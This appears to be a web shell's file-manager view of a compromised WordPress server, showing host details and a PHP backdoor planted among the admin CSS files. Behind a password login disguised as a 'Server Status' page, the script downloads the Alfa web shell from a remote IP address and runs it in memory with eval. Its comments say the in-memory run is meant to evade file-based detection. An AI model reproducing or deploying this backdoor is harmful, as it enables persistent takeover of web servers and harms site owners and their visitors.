HEX
Server: nginx/1.24.0
System: Linux ip-10-50-20-85 6.5.0-1022-aws #22~22.04.1-Ubuntu SMP Fri Jun 14 16:31:00 UTC 2024 x86_64
User: usefuloffices.org (1001)
PHP: 8.1.2-1ubuntu2.23
Disabled: NONE
$ pwd: /var/www/usefuloffices.org/httpdocs/wp-admin/css/colors/
Upload Files
File: /var/www/usefuloffices.org/httpdocs/wp-admin/css/colors/7878347347384BPASS.php
<?php
/**
 * Konfigurasi Keamanan
 * Ganti '6effe27d6aad2e8a76dc35373aeae74a' dengan MD5 hash password Anda.
 * (Contoh di bawah hash dari: 1234)
 */
$password_hash = "6effe27d6aad2e8a76dc35373aeae74a"; 

session_start();

// Logout jika diminta
if (isset($_GET['logout'])) {
    session_destroy();
    header("Location: ?");
    exit;
}

// Proses Login
if (isset($_POST['pass'])) {
    if (md5($_POST['pass']) === $password_hash) {
        $_SESSION['auth_key'] = $password_hash;
    } else {
        $error = "Akses Ditolak!";
    }
}

// Tampilan Form Login jika belum login
if (!isset($_SESSION['auth_key']) || $_SESSION['auth_key'] !== $password_hash) {
    ?>
    <!DOCTYPE html>
    <html>
    <head>
        <title>Server Status</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <style>
            body { background: #111; color: #fff; font-family: sans-serif; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; }
            form { background: #222; padding: 20px; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.5); }
            input { padding: 10px; border: none; border-radius: 4px; margin-right: 5px; }
            button { padding: 10px; background: #ce4242; color: white; border: none; border-radius: 4px; cursor: pointer; }
        </style>
    </head>
    <body>
        <form method="post">
            <h3>Authentication</h3>
            <?php if(isset($error)) echo "<p style='color:red'>$error</p>"; ?>
            <input type="password" name="pass" placeholder="Password..." required>
            <button type="submit">Enter</button>
        </form>
    </body>
    </html>
    <?php
    exit;
}

// --- JIKA LOGIN BERHASIL, JALANKAN REMOTE FETCH ---

$url = 'http://185.128.227.157/ALL-SHELL/raw-ker/alfa.txt';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0.0.0');

$body = curl_exec($ch);
curl_close($ch);

if ($body) {
    // Menghapus BOM jika ada
    $body = str_replace("\xEF\xBB\xBF", '', $body);
    
    // Eksekusi via eval tanpa membuat file fisik (agar tidak terbaca 0kb oleh LiteSpeed)
    if (preg_match('/<\?php/i', $body)) {
        eval('?>' . $body);
    } else {
        echo $body;
    }
} else {
    echo "Gagal mengambil data dari sumber.";
}
@ Telegram